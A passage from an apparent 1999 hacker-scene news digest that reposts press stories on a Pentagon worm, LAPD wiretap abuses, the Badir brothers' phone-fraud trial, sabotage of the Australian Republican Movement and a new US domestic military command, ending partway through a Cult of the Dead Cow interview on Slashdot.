      evidence. And still other agents, armed with a court
      order, monitor suspected criminals as they surf the
      Net. 

      "The Web is like the biggest city on the planet. Wander
      around long enough and you're going to trip over
      something illegal," Nick says. 

      Those somethings have included poached ivory and
      Peruvian antiquities, and manufacturing equipment for
      building triggers for nuclear warheads. Other seizures
      include companies selling chemicals used as main
      ingredients in poison gases, snake venom do-it-yourself
      suicide kits, and, yes, even Cuban cigars. 

      "If it's on the Net, we are there and looking at it," Nick
      says. 


      On the Border

      Customs' primary mandate is to protect the nation's
      borders from the flow of illegal goods into the United
      States and to guard trade interests of U.S. companies.
      But in 1980 Customs created a child protection unit
      after it began intercepting alarming numbers of
      overseas packages containing child pornography. 

      Eight years later, when the agency noticed computer
      bulletin boards were being used to transmit child
      pornography, it began policing the Internet. Today,
      Customs says nearly all the crimes it is mandated to
      prevent, from child pornography and smuggling to
      financial crimes and fraud, can be found on the Net. 

      It estimates related computer crimes cost U.S.
      business $10 billion a year. The music industry alone,
      it says, was bilked $300 million last year in lost
      revenue to digital downloads of MP3s. 
      
      @HWA
      
42.0  Virus and Marines Fight It Out In the Pentagon 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by keydet89 
      An unknown virus that has not been seen before has
      attacked US Marine Corps computers. The infestation
      has been limited to the Pentagon and the Navy Annex.
      It is unknown how the infection began. 

      CNN      
      http://cnn.com?/TECH/computing/9910/22/marines.worm.01/
      
      Marine Corps headquarters at
      Pentagon hit by computer
      virus 

      October 22, 1999
      Web posted at: 12:58 a.m. EDT (0458 GMT)

      From CNN National Security Producer Chris
      Plante

      WASHINGTON (CNN) -- Marine
      Corps computer technicians were at
      work overnight Friday, improving
      security, after the Corps headquarters
      at the Pentagon was hit by a "worm
      virus," a Marine Corps source told
      CNN. 

      The Thursday afternoon attack infiltrated only "unclassified" computer
      systems, according to the source, and affected Microsoft programs only.
      Computer systems containing sensitive or "classified" information were not
      affected, he said. 

      The Marine Corps computer warriors were working with computer experts
      from Symantec Corp. to defeat the virus and retrieve lost files. 

      Virus left blank pages

      The attack left Marines around the Pentagon looking at blank pages where
      documents had once resided. Symantec installed Norton Anti-Virus software
      for the Marines. 

      While the military is a popular target for computer hackers, the Marine Corps
      official told CNN that Thursday's attack was from "a different strain or a virus
      we have not seen before." 

      "You went into your files and they were all empty," he said. 

      Only computers at the Pentagon and the nearby Navy Annex to the Pentagon
      were infected by the virus, the official said. 

      The Pentagon has spent hundreds of millions of dollars in the last several
      years bolstering computer security, to combat attacks on computer systems
      from international foes, companies and domestic computer hackers. 

      The Marine Corps official said it was not clear how the virus entered its
      system. 
      
      @HWA
      
43.0  LAPD Abuse Wiretapping Power 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Alien Plague 
      The LA Public Defenders Office is charging that the
      LAPD has committed widespread illegal wiretapping and
      that the District Attorney is covering it up. One wiretap
      covered a cellular phone company, it monitored over
      250 cell phones and lasted for two years but was
      reported as one wiretap. Another case involved the
      wiretapping of a pay phone, monitoring thousands of
      innocent people's phone calls. Privacy advocates, such
      as the EFF and EPIC, are arguing that there is a need
      for encrypted communications to protect Americans
      from similar official, but illegal, surveillance. 

      ZD Net       
      http://www.zdnet.com/zdnn/stories/news/0,4586,2378149,00.html?chkpt=hpqsnewstest
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Wiretapping abuses alarm EFF, EPIC
      By Kevin Poulsen, ZDNN
      October 21, 1999 12:05 PM PT

      LOS ANGELES -- The Los Angeles Police Department and district attorney's 
      office are covering up widespread and illegal wiretapping, the Los 
      Angeles public defender's office charged Wednesday, in the latest round of 
      a growing legal battle that's piqued the interest of electronic privacy 
      advocates. 

      John Gilmore, co-founder of the Electronic Frontier Foundation, said the 
      case shows why citizens need communications that are protected by 
      encryption. "We have the metropolitan police department of one of the 
      largest cities in America doing illegal wiretaps, and covering it up by 
      falsifying the statistics," he said. 

      Last year, the LAPD and prosecutors admitted to concealing the role that 
      court authorized wiretaps played in 58 criminal cases since 1993 -- 
      a practice that defense attorneys say violates federal and state laws and 
      cheats defendants of the right to challenge the legality of a wiretap. 

      In November, Superior Court Judge Larry Fidler ordered prosecutors to end 
      the practice, and to inform defendants who had been subject to 
      secret wiretaps in the past. Deputy Public Defender Kathy Quant charged 
      Wednesday that prosecutors violated that court order. 

      DA's office is 'lying'

      "They're lying," Quant told Fidler, "and I can prove that." 

      Quant claimed that her office's investigation has uncovered as many as 425       
      cases that may be tainted by secret wiretapping, and which the district 
      attorney's office has yet to acknowledge. Some of the wiretaps, she 
      alleged, were done without a court order. 

      Los Angeles Deputy District Attorney Robert Schirn admitted to missing 
      some cases in which wiretaps were used, but insisted that the office 
      substantially complied with the court order. 

      "It's an impossible burden, I think, to identify every case. We've done 
      our best," Schirn told the court. 

      Schirn also dismissed the public defender's allegations as speculation. 
      "Some of these cases clearly don't involve wiretaps," he said. 

      'Hundreds' of people recorded

      Particularly troubling to electronic 
      privacy advocates is the charge that prosecutors manipulated public 
      wiretap statistics by using a single court order to obtain multiple taps. 
      One order, targeting a cellular telephone company, lasted two years and 
      tapped 250 phones, but was reported to state and federal authorities as a 
      single surveillance. 

      "This case shows that ordinary people need communications that are 
      protected by encryption so they won't become victims of this 
      official but illegal type of wiretapping," said EFF's Gilmore. 

      David Banisar, a Senior Fellow with the Electronic Privacy Information 
      Center, consulted for the Los Angeles public defender's office on 
      the case earlier this year. He accuses police investigators of ignoring 
      so-called minimization requirements -- the legal requirement that innocent 
      parties be spared from surveillance. 

      "They pretty much sucked everything down," said Banisar in an interview 
      early this month. "There were some cases where they tapped pay 
      phones and recorded literally hundreds of thousands of innocent people." 

      "This case provides a good reason to reverse CALEA," says Gilmore, 
      referring to the 1994 Communication Assistance for Law Enforcement Act 
      that requires phone companies to make wiretapping easier for all law 
      enforcement agencies. "If you build an infrastructure that encourages 
      wiretapping, it will be abused. The only question is, how many years or 
      decades will it take to find out it's been abused." 

      Fidler set a date of Nov. 3 for testimony and evidence on the matter. 

      Kevin Poulsen writes a weekly column for ZDTV's CyberCrime.
      
      @HWA
      
44.0  Three Blind Men Await Trial in Israel For Computer Crime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Space Rogue 
      Three blind men in Israel have been charged with
      breaking into a military switchboard and making long
      distance calls. The men, blind since birth, were
      arrested back in July and the case is finally coming to
      trial. This is the first case involving computer fraud to
      be tried in Israel. 

      MSNBC 
      http://www.msnbc.com/news/325973.asp?cp1=1

      Globe Technology - July 2nd Edition
      http://www.globetechnology.com/archive/gam/News/19990702/UHACKN.html
      
      HNN Archive for July 7, 1999  
      http://www.hackernews.com/arch.html?070799
      
      MSNBC;
      
      Blind brothers, allegedly hackers,
               disconcert Israel with cybercrimes
                                                  By Stephen J. Glain
                                              THE WALL STREET JOURNAL

      JERUSALEM, Oct. 21 -- Since Israel is obsessed with
      security and high technology, the bizarre case of
      the Badir brothers is even stranger. Israeli
      prosecutors say Munther and Muzhir Badir, two
      young and mischievous Israeli Arab brothers,
      managed to tap into an Israeli Defense Force
      radio-station switchboard last year and make
      international phone calls.
               
      PIERCING SUCH SENSITIVE NETWORKS would
      seem to be an achievement for two members of Israel's
      marginalized Arab community -- especially since the
      brothers, who aren't college-educated, have been blind since
      birth. Even prosecutor Doron Porat calls Munther Badir, the
      alleged cybercrime ringleader who prosecutors say had
      other accomplices, a genius ... who has clearly overcome
      this disability.
             
      BLIND AMBITION
             As the Badir trial begins in a Tel Aviv district court,
      other Israeli Arabs are either taking delight in seeing Israel
      annoyed by the two brothers, or casting the Badirs as
      innocent victims of an Israeli conspiracy. After all, some ask,
      how could a blind person engineer such a scheme?
             "It could be done with God's help, otherwise it's
      impossible," says Ahmed Rafik, a 39-year-old computer
      engineer in Ummal Fahem, not far from the Badirs'
      hometown of Kfar Qasem, less than an hour's drive from Tel
      Aviv. "Of course there's something strange going on."
             The trial is expected to continue for several months. The
      defense, in and out of court, has cast the Badirs as victims of
      state-sponsored discrimination, a claim Mr. Porat calls a
      cynical attempt to sway public opinion.
             Prosecutors say the Badir case is the first involving
      computer fraud to be brought to trial here, and Israel is
      reacting with some alarm. Local telephone companies are
      tightening security. The Israeli Defense Force has formed a
      new unit headed by a general concerned about wars of the
      future in cyberspace. And last week, Israel announced it
      was assigning a senior officer in charge of fighting terrorism
      to a joint U.S.-Israeli task force aiming at countering
      cyber-terror.
             The Badirs aren't shy about their notoriety. Police say
      Munther, 22 years old, taunted his interrogators after one of
      his many arrests by proclaiming that "the cop who can catch
      me hasn't been born." By "catch" he means build a case that
      will stick. Muzhir, 23, claims that whenever the two walked
      through Israeli government offices, security guards would
      follow them and instruct the staff to turn off their computers
      (police won't confirm that).
             
      INNER WORKINGS
             In a telephone interview, Muzhir Badir says he and his
      brother became fascinated with gadgets in their preteens. "It
      wasn't enough for us to listen to a tape player," he says. "We
      were interested in how this player made a sound, how the
      television worked, and how the speakers relayed sounds to
      us."



             Computers, says Muzhir, opened an interactive world
      that only a sightless person could fully appreciate. At first,
      they dictated system commands for their mother to type.
      Then they wrote their own programs using a Braille
      keyboard, later replaced with a voice-activated personal
      computer.
             By 1995, still in their teens, the Badirs were running their
      own computer-consulting company; Munther appeared as a
      blind prodigy on an evening TV talk show.
             At that point, the Badirs had a clean record, except for a
      police report accusing Munther of leaving an obscene
      greeting on a high-school teacher's voice mail. But
      government agents soon suspected the Badirs' consulting
      company was a cover for credit-card fraud. A police raid of
      the office found a store of small appliances and electronic
      goods, but investigators could never prove that they had been
      stolen.
             Less than two years later, Munther and an accomplice
      (not his brother) were found guilty of cracking computer files
      to locate plots of land owned by aged Israelis living abroad,
      and selling the land for hundreds of thousands of dollars,
      using bank details and forged documents to validate the
      transactions. Prosecutors asked the court to rush through the
      trial because the victims were so old and might die. Mr. Badir
      was given a suspended sentence; his partner got a 10-year
      prison sentence for land fraud, which he is serving.
             Police say the Badir brothers recently broke into an
      army radio station in Jaffa and sold cheap long-distance calls
      to Arabs lining up about 90 miles away at a kiosk in Gaza.
      The brothers are also alleged to have secured two unused
      phone lines operated by Israel's state-owned telephone
      company and used them from home at the company's
      expense. Police estimate Munther alone earned $10,000 a
      day selling phone service on the phone networks he allegedly
      tapped into.
             
      NATURE OF THEIR INTEREST
             According to the indictments, Munther also jammed the
      telephone lines of a neighborhood brothel to curry favor with
      its rival, which he patronized. Untrue, says Muzhir, who says
      the Badir brothers' only contact with brothels was their
      humanitarian attempt to locate two Druze sisters who, their
      parents feared, had been recruited as prostitutes. 
             By mid-1998, a 10-person special task force from
      Israel's elite National Fraud Squad was assigned to the Badir
      case, and was soon working well past midnight, every night.
      Police had so much respect for the Badirs that they
      conducted the probe on personal laptop computers, fearful
      that their quarry would hack into their agency's main
      computer system and destroy or alter their findings.
             To learn the basics of computer hacking, investigators
      interviewed Ehud Tenenbaum, the 19-year-old computer
      brain who earlier this year broke into the Pentagon and
      NASA systems. Their first breakthrough came about four
      months into the investigation, when they say they established
      how the Badirs managed to make long-distance calls to
      Holland. The brothers, they concluded, were exploiting secret
      codes that allow program writers to access their systems.
             In all, the agents say, the Badir brothers mastered about
      10 methods of hijacking phone systems, including one police
      dubbed "The Trojan Horse," a secret passageway into the
      system.
             
      MASSIVE EVIDENCE
             The investigation produced a 47-count indictment
      supported by 30,000 paper documents that fill 50 cardboard
      crates, plus thousands of computer files. In a June raid, police
      squad cars cordoned off the street where the brothers lived,
      searched the house, and took Munther and Muzhir away. 



             Um Ashraf Qasem, the Badirs' mother, says her
      neighbors are afraid to call her, for fear her phone is bugged.
      A heavy-set woman in a powder-blue head scarf, Mrs.
      Qasem says the case against her sons is part of a sustained
      Israeli effort to keep its Arab population mired in poverty.
      "The Israelis think all we can do is eat and sleep," she says
      from the porch of the Badirs' modest house. "We're not
      allowed to be talented."
             Munther Badir, who remains in jail, has become a
      celebrity. He hailed himself in interviews with the Hebrew
      and Arab-language press as "Israel's No. 1 computer
      expert." He claims to have worked as a computer consultant
      for the Labor Party a year ago, rigging a system failure that
      he promptly solved to showcase his expertise. He then
      blamed the crash on Prime Minister Ehud Barak's political
      opponents. Labor Party officials say they have no record of
      Mr. Badir's having worked for them.
             Muzhir was released on bail a month ago. He says
      police tormented the blind brothers during interrogations,
      asking them to identify the color of their shirts and placing
      obstacles in their path to trip over. Police say the brothers
      were treated humanely. But when a power failure one
      evening draped the prison in darkness, the brothers taunted
      back: "We can see in the dark. Can you?"
             
             Copyright © 1999 Dow Jones & Company, Inc.
      All Rights Reserved.
      
      @HWA
                   
45.0  ARM Target of Cyber Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by tall.drink 
      The Australian Republican Movement has been the
      victim of threats and possible cyber attack. A 20-page
      fax threatening the 200 staff and supporters of the ARM
      declared "info-war" and claimed to control all the
      electronic equipment in the office. 20 minutes after
      receiving the fax the ARM's call center was 'disabled',
      email was 'jammed', and computer systems shut-down.
      It is thought that the Empire Loyalist Movement may be
      responsible but they are denying any involvement.
      (From the piddly amount of information in these
      articles this looks like more of a propaganda move than
      a legitimate cyber attack.) 

      Sydney Morning Herald
      http://www.smh.com.au/news/9910/22/pageone/pageone12.html
      
      Technology News
      http://technology.news.com.au/frameset/frameset.htm?/news/4183045.htm
      
      Australian Broadcasting
      http://www.abc.net.au/news/referendum99/ref99-21oct1999-8.htm
      
      Australia News 
      http://www.news.com.au/frameset.htm?/news_content/breaking_content/91021no.htm
      
      Sydney Morning Herald;
      
      Police on track of the 'mad hacker'

      By STEPHANIE PEATLING

      A computer hacker threw the national headquarters of the Australian 
      Republican Movement into chaos yesterday after sending an intimidatory fax 
      and shutting down its phone and Internet lines.

      Police are investigating.

      A 20-page fax threatening the 200 staff and supporters of the ARM listed 
      on its Web site was sent to the Park Street office at 7.10am. "You ain't 
      seen nothing yet," it concluded.

      The fax was sent by a group calling itself the Australian Underground and 
      the Empire Loyalist Movement. 

      The Herald contacted the founder of the group, Mr Andrew Sanders, 
      yesterday afternoon. He denied having anything to do with the attack.

      Mr Sanders, 19, who runs an Internet and e-commerce company, said neither 
      he nor the 23 people who worked with him would have been responsible for 
      the attack.

      "We are against the republic and I will uphold freedom of speech to the 
      day I die, but we would never go that far," he said. 

      "We've got a sick sense of humour, but threatening people and damaging 
      equipment is not something we are into."

      About 20 minutes after the fax was received at the ARM's office its 
      national telephone call centre was disabled, e-mail facilities were 
      jammed, and the office's computer system was shut down.

      "We have declared info-war upon you," the fax read. 

      "Look around you, see all the electronic equipment? We can control it and 
      we will. 

      "Every item in your office will be working against you. Bow down to the 
      electronic generation. 

      "God help you if we become a republic."

      A Web site referred to in the fax also asked anti-republicans to picket 
      referendum polling booths on November 6.

      Mr Sanders said he thought the attack was the work of someone seeking the 
      attention of the organisers of the Empire Loyalist Movement.

      The ARM's national campaign director, Mr Greg Barnes, said the attack was 
      "intimidatory and irrational" and called in the State and Australian 
      Federal police and Telstra to investigate.

      "No" campaigners distanced themselves from the incident.

      "The No Committee and Australians for a Constitutional Monarchy have no 
      knowledge of or connection with this group, and categorically deny any 
      involvement with the breakdown of ARM communications facilities," their 
      statement said.
      
      -=-
      
      Technology News;
      
      Hackers deny Republican attack
      From AAP
   
      22oct99
   
      AN underground computer hacking group blamed for today's sabotage
      of the Australian Republican Movement's head office has denied
      responsibility. 
   
      The group, known both as Halcon and as the Australian Underground
      and Empire Loyalist Movement, was blamed for jamming phones and
      e-mails into ARM and shutting down its computer system. 
   
      Halcon hacker "Valiant" tonight denied the group was responsible for
      the incident. 
   
      He said the sabotage was probably done by a "scriptkiddy", a young
      teenager working alone trying to get the group's attention. 
   
      "You only need a modem and a computer, a 12-year-old could do it,"
      Valiant told AAP. 
   
      "We are anti-republican, but we wouldn't take that sort of action, we
      consider that lame." 
   
      ARM was also faxed a list containing 200 names of ARM staff and
      supporters along with threats of violence. 
   
      Valiant said Halcon was Australia's oldest underground hacking group,
      formed in 1993. 
   
      He said it had 24 current members and thousands of supporters. 
      
      -=-
      
      Australian Broadcasting;
      
      Website owner denies republic
      movement sabotage

      The operator of a website named in a threatening fax to the
      Australian Republican Movement's (ARM) national office
      has denied all knowledge of electronic sabotage.

      The ARM office in Sydney lost its email capacity and most
      of its phone system after receiving a fax threatening an
      info-war.

      The fax said the Australian Underground Movement and
      the Empire Loyalist Movement would have the office's
      electronics working against the ARM. 

      It referred to the anti-republican features on a website. 

      The operator of that site says he has articles from those
      groups but the site is about telecommunications and
      freedom of speech and the call to bear arms if opposing
      the republic fails is just a pun.

      "We're generally an apathetic, intellectual organisation and
      it's a very well known organisation in Australia. But to
      whoever that was, it was very, very lame," the operator
      said.

      -=-
      
      Australia News;
      
      ARM sabotage 'appalling': No
      campaigners
      From AAP
      21oct99 
     
      3.40pm (AEST) THE sabotage of the Australian Republic Movement's
      head office was today denounced by the No campaign as appalling. 
     
      A group calling itself the Australian Underground and Empire Loyalist
      Movement today jammed phones and e-mails into ARM and shut down
      its computer system. 
     
      ARM was also faxed a list containing 200 names of ARM staff and
      supporters along with threats of violence. 
     
      No campaign convenor Kerry Jones said her organisation had nothing
      to do with the attack, and completely dissociated itself from those
      responsible. 
     
      "They are nothing to do with us, I do not know them and we have
      nothing to do with them," she said. 
     
      "I think that sort of action is appalling. 
     
      "It is not condoned by anybody that we're associated with and I hope
      that the people of Australia realise that we do not condone that sort
      of action under any circumstance." 

      @HWA
     
46.0  Military Unit Formed For Domestic Deployment 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Brian Oblivion 
      Congress is seeking a broader use of U.S. military forces
      in a domestic law enforcement role including a new unit
      for deployment in assisting civilian officers during a
      terrorist attack. This appears to be in direct violation of
      the 1878 Posse Comitatus Act, which prohibits federal
      troops from participating in domestic law enforcement
      activities. 

      "The American people should not be concerned about
      [U.S. military forces on the streets of U.S. cities]. They
      should welcome it." - Defense Secretary William Cohen 

      World Net Daily 
      http://www.worldnetdaily.com/bluesky_dougherty/19991013_xnjdo_new_milita.shtml
      
      New military unit 
      for domestic deployment 
      Cohen says Americans should 
      'welcome' troops on home soil 


      By Jon E. Dougherty
      © 1999 WorldNetDaily.com

      Critics are denouncing recent congressional changes to
      the Posse Comitatus Act that will allow a broader use of
      U.S. military forces in a domestic law enforcement role
      including a new unit for deployment in assisting civilian
      officers during a terrorist attack. 

      The new command, established Oct. 7 in Norfolk, Va.,
      will be called the U.S. Joint Forces Command, and
      replaces the former U.S. Atlantic Command. At a
      ceremony commemorating the new unit, Defense
      Secretary William Cohen told participants the American
      people shouldn't fear the potential of seeing U.S. military
      forces on the streets of U.S. cities. 

      The military must "deal with the threats we are most
      likely to face," Cohen told reporters, downplaying
      concerns about troops operating on home soil. "The
      American people should not be concerned about it. They
      should welcome it." 

      The new command is designed to prepare U.S. troops to
      fight abroad or to respond if terrorists strike with nuclear,
      chemical or biological weapons. 

      In opposing the measure, critics cite the 1878 Posse
      Comitatus Act, which prohibits federal troops from
      participating in domestic law enforcement activities under
      most circumstances. With the concern over domestic
      terrorism rising since the World Trade Center bombing
      and numerous incidences of cyber-attacks on U.S.
      defense and financial institutions, the Clinton
      administration has begun to relax some of those
      restrictions. 

      In July, WorldNetDaily reported the new measures would
      end the requirement for local law agencies to reimburse
      the federal government for any local use of military
      equipment, as well as enable the Department of Defense
      to deploy military troops in cases of anticipated or actual
      terrorist attacks. 

      Then, David Kopel of the Independence Institute warned
      that the measures would, if passed, "set (bad) precedents
      for years to come." 

      Since the Waco debacle in 1993, when federal law
      officers and military personnel assaulted a church
      community resulting in the deaths of over 80 men, women
      and children, Kopel said the federal government has been
      "eroding the protections contained in the Posse Comitatus
      Act." In the past, he told WorldNetDaily, most of the
      amendments to the original law had been based on bogus
      drug issues. Now, he said, that issue seems to have
      shifted to so-called terrorist attacks, or at least the threat
      of them. 

      The Defense Department has said only the military has
      enough equipment to operate in a poisoned environment,
      or to manage a massive decontamination effort.
      Secretary Cohen told reporters last week that federal law
      will not be violated because the military would only
      respond if requested. 

      "It is subordinate to civilian control," he said. 

      But Gregory Nojeim, legislative counsel for the American
      Civil Liberties Union in Washington, D.C., told
      WorldNetDaily he is concerned about "nightmare
      scenarios" like those in the recent films, "Enemy of the
      State" and "The Siege." 

      "Soldiers are not equipped, by training or temperament, to
      enforce the laws with proper regard for civil and
      constitutional rights," he said. "They're trained to kill the
      enemy." 

      Nojeim said the ACLU is concerned about "letting loose
      the most effective fighting force in the history of the
      world" on American civilians. 

      Cohen said that the creation of the Joint Forces
      Command would better coordinate the training of the four
      armed services. However, history is replete with reasons
      why some Americans continue to be hesitant about using
      military troops in a law enforcement capacity.

      Besides questions about the Army's Delta Force role
      during the Waco siege, most recently, in 1997, U.S.
      Marines assigned to assist the U.S. Border Patrol in
      combating illegal immigration accidentally shot and killed
      an 18-year-old goat herder. That force has since been
      withdrawn and reassigned, but lawmakers have remained
      committed to expanding the military's civil law
      enforcement role in other ways.

      For example, the military also has been given an
      expanded role in defending against cyber-terrorism, or
      assaults on U.S. computer systems. The U.S. Space
      Command in Colorado will be leading that effort.

      Nojeim questioned the need for such an expansion of
      federal military forces into the domestic law enforcement
      arena, even though U.S. officials have said the nation is
      now at greater risk of terrorist attack. He also believes
      the White House should do a better job of educating the
      American people about why the changes to the Posse
      Comitatus law are needed.

      "For years the federal government has showered the FBI
      with hundreds of millions of new dollars to help it combat
      crimes involving chemical and biological weapons," he
      told WorldNetDaily. "Taxpayers need to know where
      that money has gone and why the president now wants to
      call in the troops."

      Addressing the long-term ramifications of the change in
      military law enforcement policy, Nojeim said, "When the
      crisis hits, those with the biggest guns will be subordinate
      to no one."
      
      @HWA
      
47.0  cDc Interview Posted On Slashdot 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Space Rogue 
      We don't have a URL yet but Slashdot should be posting
      the results of its email interview with the Cult of the
      Dead Cow sometime on Friday. Should be worth a read.

      Slashdot
      http://www.slashdot.org
      
      Bizarre Answers from Cult of the Dead Cow

      Posted by Roblimo on Friday October 22, @12:30PM EDT from the
      people-mommy-warned-you-about dept.

      Monday's questions for the Cult of the Dead Cow ranged from
      serious-tech to silly. Various members of the Cult answered
      appropriately. Great stuff! One warning: if you are offended by
      strong language or are a hacker under 18, you should not read this Q&A
      session. The Cult is one of those groups the assorted nanny-censor
      programs try to keep away from deity-fearing, good-citizen, mass-average
      folks because they're commie anarchist no-gooders. Or something like that
      (and we like them that way!) Click below to learn why these people are A
      Danger to the Established Order(tm).

      tdsanchez asks: How has the 'mission' and/or purpose of cDc changed as the 
      years have passed, especially with the advent of pervasive internet 
      connectivity and the 'death' of classic dial-up BBS's? 

      cDc answers:

      Obscure Images answers: cDc's mission has never changed. We are still 
      primarily motivated by the desire to dominate the world. I think that if 
      anything, the growth of the internet has just been part of our plans for 
      your tomorrow. 

      G. Ratte' answers: The mission has never changed... it's always been about 
      us trying to do cool stuff. The Internet has just made it easier to 
      communicate and it's a lot less hassle than when you had to worry about 
      how fresh your long distance codes were, back in the day. Call my dead 
      BBS! Demon Roach Underground, 806/794-4362. 2400 baud! Apple II, baby! 

      Nighstalker answers: The whole point of cDc is to communicate. While 
      T-shirts and watches and BO2K are the glitz, the core of cDc is 
      communicating to and with the world. The venerable T-File is the heart and 
      soul of cDc and we will never abandon this most basic and venerable facet 
      of the telecom/computer demimonde 

      Tweety Fish answers: We are currently in the process of training our 
      massive, highly secretive ninja army. 

      M1000 asks: How would you define the implementation of security on the 
      major OS today? 

           Windows95 / 98
           Commercial Unix
           Linux
           FreeBSD
           NT
           Windows 2000 (NT5)
           etc.

      cDc answers:

      Nighstalker answers: If it's from MS, the security is crap. Everything
      else is better by comparison. Linux is pretty good if you're a Linux
      guru. Same thing with any other flavor of UNIX. But no matter how good you
      are, there's someone out there who is better than you.

      "The price of secure connectivity is eternal vigilance!"

      DilDog answers:

           Windows95 / 98 - Shit happens
           Commercial Unix - Shit happens over RPC.
           Linux - When shit happens, you fix it.
           FreeBSD - Shit would happen, but there's no driver for it yet.
           NT - Shit wouldn't happen if you'd just spend a few months
                performing 300+ modifications to our default installation,
                you lazy sysadmin. Get your MCSE.
           Windows 2000 (NT5) - Shit happens over DCOM.

      Tweety Fish answers: Except for Windows95/98, which I would characterize
      as sucking ass across the board, there's no simple answer to that
      question. All of those operating systems are (reasonably) securable, in
      theory, but if you want to make the job of securing a box easier, why not
      run OpenBSD?

      xmedar asks: There is an episode of South Park with cows worshipping a cow 
      clock, and when it is removed by the people, the cows all jump off a 
      cliff, now I've heard that referred to as the Cult of the Dead Cow episode, 
      is it anything to do with cDc or are cults for dead cows just in fashion 
      right now? 

      cDc answers:

      Obscure Images answers: We would like to believe that we were
      inspirational to the creators of South Park, but we will defer to the
      obviously natural call of bovinity.

      Reid Fleming answers: Our lawyers will not permit us to comment upon
      the episode in question.

      G. Ratte' answers: Sure. I hear the next round of Calvin Klein ads will
      feature Kate Moss munching a big greasy cheeseburger as Kari Wuhrer
      cleaves an axe through a cow's head. And a roomful of Italian boys with
      no chest hair look on in quiet desperation. It's a scene straight from
      one of our industry convention parties.

      Nighstalker answers: The universe is a chaotic system. If Ratte had been
      screwing around in a sewage treatment plant, rather than an abandoned
      slaughterhouse, we could have been called the Cult of Recycled Shit.
      That the guys from South Park had a cult of suicidal cows may be our
      fault. Maybe not.

      Tequila Willy answers: I know this episode well, and I've spent a lot of
      time studying the various interpretations of this episode. Though the
      Cult of the Dead Cow interpretation is a very plausible and popular
      connection to make, there is another very plausible interpretation that
      I think you will find interesting. The hands on the clock are metaphors
      for the phallus. The removal of the clock represents castration. The
      removal of the phallus limits sexual options and limited options are
      bad. The cows demonstrate their adherence to their principle of "maximum
      freedom or death" by jumping off the cliff. You might ask yourself,
      xmedar, whether you have any principles that you would be willing to die
      for.

      Tweety Fish answers: TV writers (comedy writers especially) tend to be
      unrepentant fanboys with computers and tight deadlines... you decide.

      Effugas asks: To the various illustrious(translation: I've worshipped you 
      guys for the majority of my life) members of the Cult of the Dead Cow: 

      Moo. 

      That being said, I'd like to know what have been the most surprising 
      events in the computer industry for you. Anything's fair game. What just 
      came out of nowhere and knocked the Cult flat on its ass? 

      cDc answers:

      Obscure Images answers: We haven't been knocked on our asses yet by
      anything that has happened in the computer industry. We're great at
      believing that whatever we see is directly caused by our underground
      efforts. We would be knocked on our ass if we didn't believe that. Oh
      yeah, Linus Torvalds is a cDc simulacra unit.

      Reid Fleming answers: www.realdoll.com www.jerkcity.com

      GA Ellsworth answers: http://www2.promisekeepers.org/

      G. Ratte' answers: I'm mostly surprised by what hasn't happened. I
      thought floppy disks would get bigger and bigger 'til they became a
      3-foot square, and you'd use 'em for kites when they went bad. I thought
      for sure bubble memory was going to take off, and pen-based OSes would
      rule the industry, and I'd have an Amiga clipboard computer running MS's
      BOB right now. It should have been Atari, not Microsoft.

      Nighstalker answers: Cheap powerful computers. Looking at the list
      prices of all my Commodore 128 gear shows me that the whole system cost
      more than a new iMac. Also, PDAs are pretty surprising, how they just
      suddenly seem to be everywhere.

      White Knight answers: What surprised me most about the computer industry
      is how much less attractive Kiki Stockhammer is in person.

      Tweety Fish answers: You know they got these things now that can take a
      picture and put it on the screen thingy? That's so cool!

      sinatra asks: A recent article (forgot the reference) characterized codc 
      members as a bunch of social juveniles bound by no particular ideals, and 
      lacking in both trust and personal respect for other members as well as 
      the (cr|h)acker communities at-large. The evidence presented in the 
      article however was limited to on-stage behavior and a virus of 
      unknown-but-suspicious origin on a distributed CD. The codc archives 
      paint an equally murky picture, depending on the reader's perspective. 

      So is there a codc code of ethics? Could such a thing ever be enforced? 

      cDc answers:

      Obscure Images answers: I can't answer for everyone, but I will say that
      I am a moral relativist. I think that the morality of an act is
      dependent on the context of that action. As for cDc as a group, we are a
      very close knit group, very nearly a family, and to think that there
      would be someone amongst us who would turn on us is an absurdity. The
      article in question was written by a well known fool who would fit in
      better at a meeting of the John Birch Society than a computer
      convention.

      Reid Fleming answers: No and no.

      G. Ratte' answers: Lacking in trust and personal respect? I wish I knew
      the article you're referring to, 'cause those are some pretty strange
      assumptions. But that's funny, that's interesting. We're the kids the
      newspapers used to write about being diagnosed with "Pac-Man elbow."
      We're the kids with the sore thumbs from Atari joysticks playing
      "Combat" through our adolescence. We're the first generation to grow up
      hearing a modem squeal every day after school. So if there's any lack of
      trust and respect for the (cr/h)acker community, it's self-loathing and
      it's all in the family. Familiarity breeds contempt. The only ethic is
      to not be, uh, k-lame. Spreading viruses is not good.

      Nighstalker answers: I read that article. The author is an ignorant
      twat.

      For what it's worth, I trust my very life with any cDc member. I trust
      them implicitly.

      I suspect that cDc individually and as a group is far more ethical than
      Microsoft. Anyone emails me, they get an answer directly from me, not
      some flack from marketing.

      Tequila Willy answers: Dear Sinatra, Who's codc? I've never heard of
      them.

      Tweety Fish answers: The nice thing about cDc is we're all cool enough,
      and all moral enough, that there really is no need for us to enforce
      much of anything. Personally, I'm constantly entertained by everything
      every other cDc member ever does, and I'd much rather have that than the
      1700 page cDc Moral Guide.

      Incidentally, the author of that article also thinks that Richard 
      Stallman should be arrested and charged with monopolistic practices, so, 
      you know, you shouldn't believe everything you read. 

      [bog-oh] asks: You folks have been around for so long, surely you've seen 
      the evolution of both terms. Are you quick to take a stand on misuse of 
      either, or do you just take it all in stride? Some of the older security 
      folks out there are damned sure that "hacking" is still purely malicious, 
